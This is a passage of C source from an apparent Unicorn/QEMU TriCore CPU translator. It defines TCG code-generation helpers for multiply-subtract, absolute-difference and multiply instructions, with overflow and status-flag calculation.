tcg_temp_free(tcg_ctx, temp); tcg_temp_free_i64(tcg_ctx, temp64); } static inline void gen_msubr32s_h(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, temp2, r1, 0xffff0000); tcg_gen_shli_tl(tcg_ctx, temp, r1, 16); gen_msubr64s_h(ctx, ret, temp, temp2, r2, r3, n, mode); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } static inline void gen_msubr_q(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, TCGv r3, uint32_t n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); gen_helper_msubr_q(tcg_ctx, ret, tcg_ctx->cpu_env, r1, r2, r3, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_msubrs_q(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, TCGv r3, uint32_t n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); gen_helper_msubr_q_ssov(tcg_ctx, ret, tcg_ctx->cpu_env, r1, r2, r3, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_msub32_q(DisasContext *ctx, TCGv ret, TCGv arg1, TCGv arg2, TCGv arg3, uint32_t n, uint32_t up_shift) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv temp3 = tcg_temp_new(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t4 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext_i32_i64(tcg_ctx, t2, arg2); tcg_gen_ext_i32_i64(tcg_ctx, t3, arg3); tcg_gen_mul_i64(tcg_ctx, t2, t2, t3); tcg_gen_ext_i32_i64(tcg_ctx, t1, arg1); /* if we shift part of the fraction out, we need to round up */ tcg_gen_andi_i64(tcg_ctx, t4, t2, (1ll << (up_shift - n)) - 1); tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_NE, t4, t4, 0); tcg_gen_sari_i64(tcg_ctx, t2, t2, up_shift - n); tcg_gen_add_i64(tcg_ctx, t2, t2, t4); tcg_gen_sub_i64(tcg_ctx, t3, t1, t2); tcg_gen_extrl_i64_i32(tcg_ctx, temp3, t3); /* calc v bit */ tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_GT, t1, t3, 0x7fffffffLL); tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_LT, t2, t3, -0x80000000LL); tcg_gen_or_i64(tcg_ctx, t1, t1, t2); tcg_gen_extrl_i64_i32(tcg_ctx, tcg_ctx->cpu_PSW_V, t1); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, 31); /* Calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* Calc AV/SAV bits */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, temp3, temp3); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, temp3, tcg_ctx->cpu_PSW_AV); /* calc SAV */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); /* write back result */ tcg_gen_mov_tl(tcg_ctx, ret, temp3); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free(tcg_ctx, temp3); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t3); tcg_temp_free_i64(tcg_ctx, t4); } static inline void gen_m16sub32_q(DisasContext *ctx, TCGv ret, TCGv arg1, TCGv arg2, TCGv arg3, uint32_t n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); if (n == 0) { tcg_gen_mul_tl(tcg_ctx, temp, arg2, arg3); } else { /* n is expected to be 1 */ tcg_gen_mul_tl(tcg_ctx, temp, arg2, arg3); tcg_gen_shli_tl(tcg_ctx, temp, temp, 1); /* catch special case r1 = r2 = 0x8000 */ tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, temp2, temp, 0x80000000); tcg_gen_sub_tl(tcg_ctx, temp, temp, temp2); } gen_sub_d(ctx, ret, arg1, temp); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } static inline void gen_m16subs32_q(DisasContext *ctx, TCGv ret, TCGv arg1, TCGv arg2, TCGv arg3, uint32_t n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); if (n == 0) { tcg_gen_mul_tl(tcg_ctx, temp, arg2, arg3); } else { /* n is expected to be 1 */ tcg_gen_mul_tl(tcg_ctx, temp, arg2, arg3); tcg_gen_shli_tl(tcg_ctx, temp, temp, 1); /* catch special case r1 = r2 = 0x8000 */ tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, temp2, temp, 0x80000000); tcg_gen_sub_tl(tcg_ctx, temp, temp, temp2); } gen_subs(ctx, ret, arg1, temp); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } static inline void gen_m16sub64_q(DisasContext *ctx, TCGv rl, TCGv rh, TCGv arg1_low, TCGv arg1_high, TCGv arg2, TCGv arg3, uint32_t n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); if (n == 0) { tcg_gen_mul_tl(tcg_ctx, temp, arg2, arg3); } else { /* n is expected to be 1 */ tcg_gen_mul_tl(tcg_ctx, temp, arg2, arg3); tcg_gen_shli_tl(tcg_ctx, temp, temp, 1); /* catch special case r1 = r2 = 0x8000 */ tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, temp2, temp, 0x80000000); tcg_gen_sub_tl(tcg_ctx, temp, temp, temp2); } tcg_gen_ext_i32_i64(tcg_ctx, t2, temp); tcg_gen_shli_i64(tcg_ctx, t2, t2, 16); tcg_gen_concat_i32_i64(tcg_ctx, t1, arg1_low, arg1_high); gen_sub64_d(ctx, t3, t1, t2); /* write back result */ tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, t3); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t3); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } static inline void gen_m16subs64_q(DisasContext *ctx, TCGv rl, TCGv rh, TCGv arg1_low, TCGv arg1_high, TCGv arg2, TCGv arg3, uint32_t n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); if (n == 0) { tcg_gen_mul_tl(tcg_ctx, temp, arg2, arg3); } else { /* n is expected to be 1 */ tcg_gen_mul_tl(tcg_ctx, temp, arg2, arg3); tcg_gen_shli_tl(tcg_ctx, temp, temp, 1); /* catch special case r1 = r2 = 0x8000 */ tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, temp2, temp, 0x80000000); tcg_gen_sub_tl(tcg_ctx, temp, temp, temp2); } tcg_gen_ext_i32_i64(tcg_ctx, t2, temp); tcg_gen_shli_i64(tcg_ctx, t2, t2, 16); tcg_gen_concat_i32_i64(tcg_ctx, t1, arg1_low, arg1_high); gen_helper_sub64_ssov(tcg_ctx, t1, tcg_ctx->cpu_env, t1, t2); tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, t1); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); } static inline void gen_msub64_q(DisasContext *ctx, TCGv rl, TCGv rh, TCGv arg1_low, TCGv arg1_high, TCGv arg2, TCGv arg3, uint32_t n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t4 = tcg_temp_new_i64(tcg_ctx); TCGv temp, temp2; tcg_gen_concat_i32_i64(tcg_ctx, t1, arg1_low, arg1_high); tcg_gen_ext_i32_i64(tcg_ctx, t2, arg2); tcg_gen_ext_i32_i64(tcg_ctx, t3, arg3); tcg_gen_mul_i64(tcg_ctx, t2, t2, t3); if (n != 0) { tcg_gen_shli_i64(tcg_ctx, t2, t2, 1); } tcg_gen_sub_i64(tcg_ctx, t4, t1, t2); /* calc v bit */ tcg_gen_xor_i64(tcg_ctx, t3, t4, t1); tcg_gen_xor_i64(tcg_ctx, t2, t1, t2); tcg_gen_and_i64(tcg_ctx, t3, t3, t2); tcg_gen_extrh_i64_i32(tcg_ctx, tcg_ctx->cpu_PSW_V, t3); /* We produce an overflow on the host if the mul before was (0x80000000 * 0x80000000) << 1). If this is the case, we negate the ovf. */ if (n == 1) { temp = tcg_temp_new(tcg_ctx); temp2 = tcg_temp_new(tcg_ctx); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, temp, arg2, 0x80000000); tcg_gen_setcond_tl(tcg_ctx, TCG_COND_EQ, temp2, arg2, arg3); tcg_gen_and_tl(tcg_ctx, temp, temp, temp2); tcg_gen_shli_tl(tcg_ctx, temp, temp, 31); /* negate v bit, if special condition */ tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, temp); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } /* write back result */ tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, t4); /* Calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* Calc AV/SAV bits */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, rh, rh); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, rh, tcg_ctx->cpu_PSW_AV); /* calc SAV */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t3); tcg_temp_free_i64(tcg_ctx, t4); } static inline void gen_msubs32_q(DisasContext *ctx, TCGv ret, TCGv arg1, TCGv arg2, TCGv arg3, uint32_t n, uint32_t up_shift) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t4 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext_i32_i64(tcg_ctx, t1, arg1); tcg_gen_ext_i32_i64(tcg_ctx, t2, arg2); tcg_gen_ext_i32_i64(tcg_ctx, t3, arg3); tcg_gen_mul_i64(tcg_ctx, t2, t2, t3); /* if we shift part of the fraction out, we need to round up */ tcg_gen_andi_i64(tcg_ctx, t4, t2, (1ll << (up_shift - n)) - 1); tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_NE, t4, t4, 0); tcg_gen_sari_i64(tcg_ctx, t3, t2, up_shift - n); tcg_gen_add_i64(tcg_ctx, t3, t3, t4); gen_helper_msub32_q_sub_ssov(tcg_ctx, ret, tcg_ctx->cpu_env, t1, t3); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t3); tcg_temp_free_i64(tcg_ctx, t4); } static inline void gen_msubs64_q(DisasContext *ctx, TCGv rl, TCGv rh, TCGv arg1_low, TCGv arg1_high, TCGv arg2, TCGv arg3, uint32_t n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 r1 = tcg_temp_new_i64(tcg_ctx); TCGv temp = tcg_const_i32(tcg_ctx, n); tcg_gen_concat_i32_i64(tcg_ctx, r1, arg1_low, arg1_high); gen_helper_msub64_q_ssov(tcg_ctx, r1, tcg_ctx->cpu_env, r1, arg2, arg3, temp); tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, r1); tcg_temp_free_i64(tcg_ctx, r1); tcg_temp_free(tcg_ctx, temp); } static inline void gen_msubad_h(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; } tcg_gen_extr_i64_i32(tcg_ctx, temp, temp2, temp64); gen_addsub64_h(ctx, ret_low, ret_high, r1_low, r1_high, temp, temp2, tcg_gen_add_tl, tcg_gen_sub_tl); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free_i64(tcg_ctx, temp64); } static inline void gen_msubadm_h(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 temp64_2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 temp64_3 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; } tcg_gen_concat_i32_i64(tcg_ctx, temp64_3, r1_low, r1_high); tcg_gen_sari_i64(tcg_ctx, temp64_2, temp64, 32); /* high */ tcg_gen_ext32s_i64(tcg_ctx, temp64, temp64); /* low */ tcg_gen_sub_i64(tcg_ctx, temp64, temp64_2, temp64); tcg_gen_shli_i64(tcg_ctx, temp64, temp64, 16); gen_sub64_d(ctx, temp64_2, temp64_3, temp64); /* write back result */ tcg_gen_extr_i64_i32(tcg_ctx, ret_low, ret_high, temp64_2); tcg_temp_free(tcg_ctx, temp); tcg_temp_free_i64(tcg_ctx, temp64); tcg_temp_free_i64(tcg_ctx, temp64_2); tcg_temp_free_i64(tcg_ctx, temp64_3); } static inline void gen_msubadr32_h(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; } tcg_gen_andi_tl(tcg_ctx, temp2, r1, 0xffff0000); tcg_gen_shli_tl(tcg_ctx, temp, r1, 16); gen_helper_subadr_h(tcg_ctx, ret, tcg_ctx->cpu_env, temp64, temp, temp2); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free_i64(tcg_ctx, temp64); } static inline void gen_msubads_h(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv temp3 = tcg_temp_new(tcg_ctx); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; } tcg_gen_extr_i64_i32(tcg_ctx, temp, temp2, temp64); gen_adds(ctx, ret_low, r1_low, temp); tcg_gen_mov_tl(tcg_ctx, temp, tcg_ctx->cpu_PSW_V); tcg_gen_mov_tl(tcg_ctx, temp3, tcg_ctx->cpu_PSW_AV); gen_subs(ctx, ret_high, r1_high, temp2); /* combine v bits */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, temp); /* combine av bits */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, tcg_ctx->cpu_PSW_AV, temp3); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free(tcg_ctx, temp3); tcg_temp_free_i64(tcg_ctx, temp64); } static inline void gen_msubadms_h(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 temp64_2 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; } tcg_gen_sari_i64(tcg_ctx, temp64_2, temp64, 32); /* high */ tcg_gen_ext32s_i64(tcg_ctx, temp64, temp64); /* low */ tcg_gen_sub_i64(tcg_ctx, temp64, temp64_2, temp64); tcg_gen_shli_i64(tcg_ctx, temp64, temp64, 16); tcg_gen_concat_i32_i64(tcg_ctx, temp64_2, r1_low, r1_high); gen_helper_sub64_ssov(tcg_ctx, temp64, tcg_ctx->cpu_env, temp64_2, temp64); tcg_gen_extr_i64_i32(tcg_ctx, ret_low, ret_high, temp64); tcg_temp_free(tcg_ctx, temp); tcg_temp_free_i64(tcg_ctx, temp64); tcg_temp_free_i64(tcg_ctx, temp64_2); } static inline void gen_msubadr32s_h(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; } tcg_gen_andi_tl(tcg_ctx, temp2, r1, 0xffff0000); tcg_gen_shli_tl(tcg_ctx, temp, r1, 16); gen_helper_subadr_h_ssov(tcg_ctx, ret, tcg_ctx->cpu_env, temp64, temp, temp2); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free_i64(tcg_ctx, temp64); } static inline void gen_abs(DisasContext *ctx, TCGv ret, TCGv r1) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_abs_tl(tcg_ctx, ret, r1); /* overflow can only happen, if r1 = 0x80000000 */ tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_PSW_V, r1, 0x80000000); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, 31); /* calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* Calc AV bit */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret, ret); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret, tcg_ctx->cpu_PSW_AV); /* calc SAV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); } static inline void gen_absdif(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new_i32(tcg_ctx); TCGv result = tcg_temp_new_i32(tcg_ctx); tcg_gen_sub_tl(tcg_ctx, result, r1, r2); tcg_gen_sub_tl(tcg_ctx, temp, r2, r1); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_GT, result, r1, r2, result, temp); /* calc V bit */ tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, result, r1); tcg_gen_xor_tl(tcg_ctx, temp, result, r2); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_GT, tcg_ctx->cpu_PSW_V, r1, r2, tcg_ctx->cpu_PSW_V, temp); tcg_gen_xor_tl(tcg_ctx, temp, r1, r2); tcg_gen_and_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, temp); /* calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* Calc AV bit */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, result, result); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, result, tcg_ctx->cpu_PSW_AV); /* calc SAV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); /* write back result */ tcg_gen_mov_tl(tcg_ctx, ret, result); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, result); } static inline void gen_absdifi(DisasContext *ctx, TCGv ret, TCGv r1, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_absdif(ctx, ret, r1, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_absdifsi(DisasContext *ctx, TCGv ret, TCGv r1, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_helper_absdif_ssov(tcg_ctx, ret, tcg_ctx->cpu_env, r1, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_mul_i32s(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv high = tcg_temp_new(tcg_ctx); TCGv low = tcg_temp_new(tcg_ctx); tcg_gen_muls2_tl(tcg_ctx, low, high, r1, r2); tcg_gen_mov_tl(tcg_ctx, ret, low); /* calc V bit */ tcg_gen_sari_tl(tcg_ctx, low, low, 31); tcg_gen_setcond_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_PSW_V, high, low); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, 31); /* calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* Calc AV bit */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret, ret); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret, tcg_ctx->cpu_PSW_AV); /* calc SAV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); tcg_temp_free(tcg_ctx, high); tcg_temp_free(tcg_ctx, low); } static inline void gen_muli_i32s(DisasContext *ctx, TCGv ret, TCGv r1, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_mul_i32s(ctx, ret, r1, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_mul_i64s(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1, TCGv r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_muls2_tl(tcg_ctx, ret_low, ret_high, r1, r2); /* clear V bit */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, 0); /* calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* Calc AV bit */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret_high, ret_high); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret_high, tcg_ctx->cpu_PSW_AV); /* calc SAV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); } static inline void gen_muli_i64s(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_mul_i64s(ctx, ret_low, ret_high, r1, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_mul_i64u(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1, TCGv r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_mulu2_tl(tcg_ctx, ret_low, ret_high, r1, r2); /* clear V bit */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, 0); /* calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* Calc AV bit */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret_high, ret_high); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret_high, tcg_ctx->cpu_PSW_AV); /* calc SAV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); } static inline void gen_muli_i64u(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_mul_i64u(ctx, ret_low, ret_high, r1, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_mulsi_i32(DisasContext *ctx, TCGv ret, TCGv r1, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_helper_mul_ssov(tcg_ctx, ret, tcg_ctx->cpu_env, r1, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_mulsui_i32(DisasContext *ctx, TCGv ret, TCGv r1, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_helper_mul_suov(tcg_ctx, ret, tcg_ctx->cpu_env, r1, temp); tcg_temp_free(tcg_ctx, temp); } /* 